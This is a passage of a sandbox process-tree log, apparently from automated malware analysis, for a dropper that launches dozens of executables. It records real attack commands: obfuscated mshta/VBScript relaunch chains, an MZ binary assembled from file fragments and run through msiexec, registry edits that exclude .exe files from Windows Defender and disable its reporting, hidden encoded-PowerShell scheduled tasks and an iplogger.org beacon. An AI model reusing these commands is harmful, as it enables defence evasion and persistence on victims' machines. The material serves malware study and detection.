        C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon003592a9c9.exe
        5⤵
        Executes dropped EXE
        
        PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00ff4fc12aa.exe
    3⤵
    PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ff4fc12aa.exe
      Mon00ff4fc12aa.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00b15efbd7085afa.exe
    3⤵
    PID:4724
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00b15efbd7085afa.exe
      Mon00b15efbd7085afa.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:4932
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbSCript:CLOse( CReatEoBJeCT ( "wscriPT.sheLL"). run ( "CMd.exe /C TYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00b15efbd7085afa.exe"" > ESYZ4xAO6IJ.eXE && sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if """"== """" for %t iN (""C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00b15efbd7085afa.exe"" ) do taskkill /f -im ""%~NXt"" ",0, True))
        5⤵
        Checks computer location settings
        
        PID:4000
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C TYpE "C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00b15efbd7085afa.exe" > ESYZ4xAO6IJ.eXE &&sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if ""== "" for %t iN ("C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00b15efbd7085afa.exe" ) do taskkill /f -im "%~NXt"
        6⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f -im "Mon00b15efbd7085afa.exe"
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE
        
        ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:1432
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbSCript:CLOse( CReatEoBJeCT ( "wscriPT.sheLL"). run ( "CMd.exe /C TYpE ""C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE"" > ESYZ4xAO6IJ.eXE && sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if ""/PdBPpkdCKFRGSs8QEyyO_B7~gkV ""== """" for %t iN (""C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE"" ) do taskkill /f -im ""%~NXt"" ",0, True))
        8⤵
        Checks computer location settings
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C TYpE "C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE" > ESYZ4xAO6IJ.eXE &&sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if "/PdBPpkdCKFRGSs8QEyyO_B7~gkV "== "" for %t iN ("C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE" ) do taskkill /f -im "%~NXt"
        9⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscRipt: close ( CREateobJect("wSCrIPt.SHELL" ). rUN( "CMd /q /C Echo | set /P = ""MZ"" > www1PR~.BG &cOpy /y /B www1pr~.BG + xZ62y.ZZY + NOSJk.fU+ mY33o.U faJSZJuU.PB& staRT msiexec -Y .\fAJszjUU.PB &dEL XZ62y.zZy NOSJk.fU MY33O.U WWW1pr~.Bg " , 0 ,truE ) )
        8⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C Echo | set /P = "MZ" > www1PR~.BG &cOpy /y /B www1pr~.BG +xZ62y.ZZY+ NOSJk.fU+ mY33o.U faJSZJuU.PB& staRT msiexec -Y .\fAJszjUU.PB &dEL XZ62y.zZy NOSJk.fU MY33O.U WWW1pr~.Bg
        9⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        10⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>www1PR~.BG"
        10⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y .\fAJszjUU.PB
        10⤵
        Loads dropped DLL
        
        PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00a123f9945ea874.exe
    3⤵
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00a123f9945ea874.exe
      Mon00a123f9945ea874.exe
      4⤵
      Executes dropped EXE
      PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00ea5164c7b44.exe
    3⤵
    PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ea5164c7b44.exe
      Mon00ea5164c7b44.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon001b59f8accf32131.exe /mixone
    3⤵
    PID:424
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon001b59f8accf32131.exe
      Mon001b59f8accf32131.exe /mixone
      4⤵
      Executes dropped EXE
      PID:3840
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 620
        5⤵
        Program crash
        
        PID:4832
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 620
        5⤵
        Program crash
        
        PID:2572
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 636
        5⤵
        Program crash
        
        PID:5104
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 636
        5⤵
        Program crash
        
        PID:2700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 652
        5⤵
        Program crash
        
        PID:3092
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 664
        5⤵
        Program crash
        
        PID:64
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1064
        5⤵
        Program crash
        
        PID:3148
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1116
        5⤵
        Program crash
        
        PID:176
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1336
        5⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        
        PID:3640
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 860
        5⤵
        Program crash
        
        PID:55200
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 652
        5⤵
        Program crash
        
        PID:55736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00f649208d1420.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3268
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00f649208d1420.exe
      Mon00f649208d1420.exe
      4⤵
      Executes dropped EXE
      PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon001871a94f.exe
    3⤵
    PID:444
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon001871a94f.exe
      Mon001871a94f.exe
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Executes dropped EXE
      Checks computer location settings
      PID:4488
    - - C:\Users\Admin\Pictures\Adobe Films\KJdt1AC74qwgTBf2MS5oPR7c.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\KJdt1AC74qwgTBf2MS5oPR7c.exe"
        5⤵
        
        PID:9776
    - - C:\Users\Admin\Pictures\Adobe Films\hYRMriHDbJe6f2PaJggxu6x0.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\hYRMriHDbJe6f2PaJggxu6x0.exe"
        5⤵
        
        PID:9880
      - C:\Users\Admin\Documents\7l_gFEcaWOVCr1iRdz3zWa3o.exe
        
        "C:\Users\Admin\Documents\7l_gFEcaWOVCr1iRdz3zWa3o.exe"
        6⤵
        
        PID:73908
        
        C:\Users\Admin\Pictures\Adobe Films\6X3ELnykhsANyEgE3T6UalVV.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6X3ELnykhsANyEgE3T6UalVV.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
        7⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\is-18KL5.tmp\6X3ELnykhsANyEgE3T6UalVV.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-18KL5.tmp\6X3ELnykhsANyEgE3T6UalVV.tmp" /SL5="$10450,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\6X3ELnykhsANyEgE3T6UalVV.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
        8⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
        9⤵
        Kills process with taskkill
        
        PID:7784
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
        9⤵
        
        PID:55944
        
        C:\Users\Admin\Programs\Adblock\Adblock.exe
        
        "C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4b401a7f1663070270 --downloadDate=2022-09-13T11:57:43 --distId=marketator --pid=747
        9⤵
        
        PID:55936
        
        C:\Users\Admin\Pictures\Adobe Films\6Br4jSGZEL6Wu9ImJDr8p3yD.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6Br4jSGZEL6Wu9ImJDr8p3yD.exe"
        7⤵
        
        PID:6708
        
        C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe
        
        "C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"
        8⤵
        
        PID:7928
        
        C:\Users\Admin\Pictures\Adobe Films\_AV1ndhyvc8AV90GRmoTu6ar.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\_AV1ndhyvc8AV90GRmoTu6ar.exe"
        7⤵
        
        PID:6776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "Get-WmiObject Win32_PortConnector"
        8⤵
        
        PID:54776
        
        C:\Users\Admin\Pictures\Adobe Films\B1SdTQCNcIXhVh586O3IdPIQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\B1SdTQCNcIXhVh586O3IdPIQ.exe"
        7⤵
        
        PID:6844
        
        C:\Windows\SysWOW64\robocopy.exe
        
        robocopy 8927387376487263745672673846276374982938486273568279384982384972834
        8⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Interests.vss & ping -n 5 localhost
        8⤵
        
        PID:54916
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        9⤵
        
        PID:55856
        
        C:\Users\Admin\Pictures\Adobe Films\8M6TG02i98bH_NnQXcwz7ckf.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8M6TG02i98bH_NnQXcwz7ckf.exe"
        7⤵
        
        PID:6920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        8⤵
        
        PID:55592
        
        C:\Users\Admin\Pictures\Adobe Films\29G3zPd7RaSB6fuZvRc2_yTN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\29G3zPd7RaSB6fuZvRc2_yTN.exe"
        7⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 340
        8⤵
        Program crash
        
        PID:8040
        
        C:\Users\Admin\Pictures\Adobe Films\EHX5OsIwkgFDZN3h2qNL6yQG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EHX5OsIwkgFDZN3h2qNL6yQG.exe"
        7⤵
        
        PID:6748
        
        C:\Users\Admin\Pictures\Adobe Films\EHX5OsIwkgFDZN3h2qNL6yQG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EHX5OsIwkgFDZN3h2qNL6yQG.exe"
        8⤵
        
        PID:7820
        
        C:\Users\Admin\Pictures\Adobe Films\37aF8qkU2FAXL5o8MXEKwmJQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\37aF8qkU2FAXL5o8MXEKwmJQ.exe"
        7⤵
        
        PID:6740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "Get-WmiObject Win32_PortConnector"
        8⤵
        
        PID:54784
        
        C:\Users\Admin\Pictures\Adobe Films\HHRFe4rcTC7pgOUmN7CnmyCi.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\HHRFe4rcTC7pgOUmN7CnmyCi.exe"
        7⤵
        
        PID:6732
        
        C:\Users\Admin\Pictures\Adobe Films\y_AQ9weACSISz_CgUeu9_HnU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\y_AQ9weACSISz_CgUeu9_HnU.exe"
        7⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" QBACSNy.g /U -s
        8⤵
        
        PID:7432
        
        C:\Users\Admin\Pictures\Adobe Films\gyfSVwmWSp_Z06PDcaK5stiO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gyfSVwmWSp_Z06PDcaK5stiO.exe"
        7⤵
        
        PID:6688
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6688 -s 424
        8⤵
        Program crash
        
        PID:7348
        
        C:\Users\Admin\Pictures\Adobe Films\mVJEk7jFonsI6hzouILV44pt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\mVJEk7jFonsI6hzouILV44pt.exe"
        7⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\robocopy.exe
        
        robocopy /?
        8⤵
        
        PID:7008
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Organisations.jpg & ping -n 5 localhost
        8⤵
        
        PID:54764
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        9⤵
        
        PID:55828
        
        C:\Users\Admin\Pictures\Adobe Films\sU4k8hfGqappXVIag1VapUBC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\sU4k8hfGqappXVIag1VapUBC.exe"
        7⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\7zSCEAA.tmp\Install.exe
        
        .\Install.exe
        8⤵
        
        PID:7184
        
        C:\Users\Admin\AppData\Local\Temp\7zSEC73.tmp\Install.exe
        
        .\Install.exe /S /site_id "525403"
        9⤵
        
        PID:7512
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        10⤵
        
        PID:51964
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        11⤵
        
        PID:52280
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        12⤵
        
        PID:55052
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        12⤵
        
        PID:55512
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        10⤵
        
        PID:52068
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        11⤵
        
        PID:52380
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        12⤵
        
        PID:54828
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        12⤵
        
        PID:55224
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gtDsjWbNI" /SC once /ST 08:40:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        10⤵
        Creates scheduled task(s)
        
        PID:52484
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gtDsjWbNI"
        10⤵
        
        PID:55536
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:71528
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:65136
    - - C:\Users\Admin\Pictures\Adobe Films\QowVg8aN0zCf2h1NxUOEIIyd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\QowVg8aN0zCf2h1NxUOEIIyd.exe"
        5⤵
        
        PID:10056
    - - C:\Users\Admin\Pictures\Adobe Films\t6SWGkXrQlgrSjWmCEIl8IrZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\t6SWGkXrQlgrSjWmCEIl8IrZ.exe"
        5⤵
        
        PID:9984
      - C:\Users\Admin\Pictures\Adobe Films\t6SWGkXrQlgrSjWmCEIl8IrZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\t6SWGkXrQlgrSjWmCEIl8IrZ.exe" -h
        6⤵
        
        PID:49012
    - - C:\Users\Admin\Pictures\Adobe Films\Dio1USNJtqrtinnpT3oOmmZ8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Dio1USNJtqrtinnpT3oOmmZ8.exe"
        5⤵
        
        PID:9976
    - - C:\Users\Admin\Pictures\Adobe Films\51hdkWQ4YlBX9iFheRa2zRNk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\51hdkWQ4YlBX9iFheRa2zRNk.exe"
        5⤵
        
        PID:9944
      - C:\Windows\SysWOW64\robocopy.exe
        
        robocopy 8927387376487263745672673846276374982938486273568279384982384972834
        6⤵
        
        PID:12764
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Interests.vss & ping -n 5 localhost
        6⤵
        
        PID:54872
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        7⤵
        
        PID:55872
    - - C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe"
        5⤵
        
        PID:9920
      - C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe"
        6⤵
        
        PID:68324
        
        C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe" --Admin IsNotAutoStart IsNotTask
        7⤵
        
        PID:6532
        
        C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3EWLPZIAKFBYkpjgfpB84YN_.exe" --Admin IsNotAutoStart IsNotTask
        8⤵
        
        PID:7860
        
        C:\Users\Admin\AppData\Local\e492d51f-cb4d-43eb-a54f-d458396fc184\build2.exe
        
        "C:\Users\Admin\AppData\Local\e492d51f-cb4d-43eb-a54f-d458396fc184\build2.exe"
        9⤵
        
        PID:55092
        
        C:\Users\Admin\AppData\Local\e492d51f-cb4d-43eb-a54f-d458396fc184\build3.exe
        
        "C:\Users\Admin\AppData\Local\e492d51f-cb4d-43eb-a54f-d458396fc184\build3.exe"
        9⤵
        
        PID:55380
    - - C:\Users\Admin\Pictures\Adobe Films\7u_JYevE3lwSnWF2xKaWA3St.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7u_JYevE3lwSnWF2xKaWA3St.exe"
        5⤵
        
        PID:9912
    - - C:\Users\Admin\Pictures\Adobe Films\BfN6LANWpOovo2u8zfK5u1Yy.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\BfN6LANWpOovo2u8zfK5u1Yy.exe"
        5⤵
        
        PID:9812
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        6⤵
        
        PID:6276
    - - C:\Users\Admin\Pictures\Adobe Films\7VVSLF3OSWgeIBLbK4S_GZa7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7VVSLF3OSWgeIBLbK4S_GZa7.exe"
        5⤵
        
        PID:9768
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9768 -s 340
        6⤵
        Program crash
        
        PID:71528
    - - C:\Users\Admin\Pictures\Adobe Films\gGgtY1kfLEscUy9P1PwjeVxz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gGgtY1kfLEscUy9P1PwjeVxz.exe"
        5⤵
        
        PID:8372
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:51820
    - - C:\Users\Admin\Pictures\Adobe Films\Y8o1SNa1DU3fqLlxVbcUtM05.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Y8o1SNa1DU3fqLlxVbcUtM05.exe"
        5⤵
        
        PID:8364
    - - C:\Users\Admin\Pictures\Adobe Films\7oaJiYosI0mCcstpkwfK9Zfj.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7oaJiYosI0mCcstpkwfK9Zfj.exe"
        5⤵
        
        PID:8356
    - - C:\Users\Admin\Pictures\Adobe Films\oRwRyUk0fT25M8sNvyuzj3Bb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\oRwRyUk0fT25M8sNvyuzj3Bb.exe"
        5⤵
        
        PID:8348
    - - C:\Users\Admin\Pictures\Adobe Films\HtYQOZ_Ofcm6KuiLQeYc9PBn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\HtYQOZ_Ofcm6KuiLQeYc9PBn.exe"
        5⤵
        
        PID:8340
      - C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" QBACSNy.g /U -s
        6⤵
        
        PID:16316
    - - C:\Users\Admin\Pictures\Adobe Films\N8U7zRKA_Fw7INRyvcn7UlNd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\N8U7zRKA_Fw7INRyvcn7UlNd.exe"
        5⤵
        
        PID:8332
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8332 -s 476
        6⤵
        Program crash
        
        PID:17256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00f599fd63.exe
    3⤵
    PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00f599fd63.exe
      Mon00f599fd63.exe
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Executes dropped EXE
      Checks computer location settings
      PID:4636
    - - C:\Users\Admin\Pictures\Adobe Films\UXTIbfY3PycxTYoRmFF76Aor.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UXTIbfY3PycxTYoRmFF76Aor.exe"
        5⤵
        
        PID:3388
      - C:\Users\Admin\Pictures\Adobe Films\UXTIbfY3PycxTYoRmFF76Aor.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UXTIbfY3PycxTYoRmFF76Aor.exe"
        6⤵
        
        PID:5296
        
        C:\Users\Admin\AppData\Local\Temp\59H1EG70HAEG07B.exe
        
        "C:\Users\Admin\AppData\Local\Temp\59H1EG70HAEG07B.exe"
        7⤵
        
        PID:13808
        
        C:\Users\Admin\AppData\Local\Temp\59H1EG70HAEG07B.exe
        
        "C:\Users\Admin\AppData\Local\Temp\59H1EG70HAEG07B.exe"
        8⤵
        
        PID:16276
        
        C:\Users\Admin\AppData\Local\Temp\68AK94CJ79L8714.exe
        
        "C:\Users\Admin\AppData\Local\Temp\68AK94CJ79L8714.exe"
        7⤵
        
        PID:13792
        
        C:\Users\Admin\AppData\Local\Temp\68AK94CJ79L8714.exe
        
        "C:\Users\Admin\AppData\Local\Temp\68AK94CJ79L8714.exe"
        8⤵
        
        PID:16296
        
        C:\Users\Admin\AppData\Local\Temp\AB153K14KJ71HDC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AB153K14KJ71HDC.exe"
        7⤵
        
        PID:15916
        
        C:\Users\Admin\AppData\Local\Temp\AB153K14KJ71HDC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AB153K14KJ71HDC.exe"
        8⤵
        
        PID:21432
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C start C:\Windows\Temp\xsv.exe
        9⤵
        
        PID:55664
        
        C:\Windows\Temp\xsv.exe
        
        C:\Windows\Temp\xsv.exe
        10⤵
        
        PID:56044
        
        C:\Users\Admin\AppData\Local\Temp\9C8888J87K0GBJJ.exe
        
        https://iplogger.org/1x5az7
        7⤵
        
        PID:17380
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" AI8vTZ.V -U -S
        8⤵
        
        PID:35332
        
        C:\Users\Admin\AppData\Local\Temp\9C8888J87K0GBJJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9C8888J87K0GBJJ.exe"
        7⤵
        
        PID:17352
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" AI8vTZ.V -U -S
        8⤵
        
        PID:33784
    - - C:\Users\Admin\Pictures\Adobe Films\GhtZhpbm5IRFO08Gk2hA91hn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GhtZhpbm5IRFO08Gk2hA91hn.exe"
        5⤵
        
        PID:4992
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:85752
    - - C:\Users\Admin\Pictures\Adobe Films\fN2ySncAYU9kj62APWytTkON.exe
        
